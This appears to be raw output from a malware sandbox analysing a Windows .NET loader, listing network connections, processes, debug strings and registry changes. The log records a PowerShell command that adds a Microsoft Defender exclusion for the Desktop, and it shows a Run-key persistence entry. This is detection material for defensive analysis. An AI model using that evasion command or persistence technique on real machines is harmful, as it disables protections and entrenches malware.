Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.8:49714 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0432B490	2_2_0432B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0432B470	2_2_0432B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_043252F0	2_2_043252F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08393EA8	2_2_08393EA8

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 1604

Source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000000.00000000.1369866881.0000000000196000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe	Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe

Source: classification engine

Classification label: mal72.evad.winEXE@15/26@2/2

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7384
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5440
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7944

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

File created: C:\Users\user\AppData\Local\Temp\windowscache.bin

Jump to behavior

Source: 9K25QyJ4hA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9K25QyJ4hA.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9K25QyJ4hA.exe	ReversingLabs: Detection: 29%
Source: 9K25QyJ4hA.exe	Virustotal: Detection: 37%

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

File read: C:\Users\user\Desktop\9K25QyJ4hA.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9K25QyJ4hA.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 1604
Source: unknown	Process created: C:\Users\user\Desktop\9K25QyJ4hA.exe "C:\Users\user\Desktop\9K25QyJ4hA.exe"
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 2428
Source: unknown	Process created: C:\Users\user\Desktop\9K25QyJ4hA.exe "C:\Users\user\Desktop\9K25QyJ4hA.exe"
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 2396
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9K25QyJ4hA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9K25QyJ4hA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 9K25QyJ4hA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdba source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb9 source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbL0Fw# source: WER8D8.tmp.dmp.23.dr
Source:	Binary string: loadermode32bit get from pastein.pdbD` source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: Ssymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: loadermode32bit get from pastein.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source:	Binary string: b77a5c561934e089.pdb source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Core.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.pdb.dll source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.000000000086B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source:	Binary string: tem.pdbO source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb9- source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb\| source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb9 source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbY source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?HoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HP<o0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTe source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbT source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ein.pdb P:Pk source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb4 source: WER6EBB.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000803000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Configuration.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: ?HoC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdb_^H source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp, WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: tem.pdb source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000A.PDBso source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000318C000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000885000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1369866881.0000000000192000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1466547531.0000000005F40000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Net.Http.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb3}z source: 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.00000000012A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: @Ho.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.1461949710.0000000000539000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841103930.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000A.PDB source: 9K25QyJ4hA.exe, 0000000F.00000002.1847723391.0000000006A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000009.00000002.1534707118.00000000009B9000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER6EBB.tmp.dmp.7.dr, WER8B6B.tmp.dmp.14.dr, WER8D8.tmp.dmp.23.dr

Source: 9K25QyJ4hA.exe

Static PE information: 0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0432051D push eax; ret	2_2_043204F3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0432633D push eax; ret	2_2_04326351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08397810 push eax; retf	2_2_08397811
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_083984D0 push eax; ret	2_2_083984E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0839713A push ds; iretd	2_2_08397156

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BlockHost.exe			Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BlockHost.exe			Jump to behavior

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
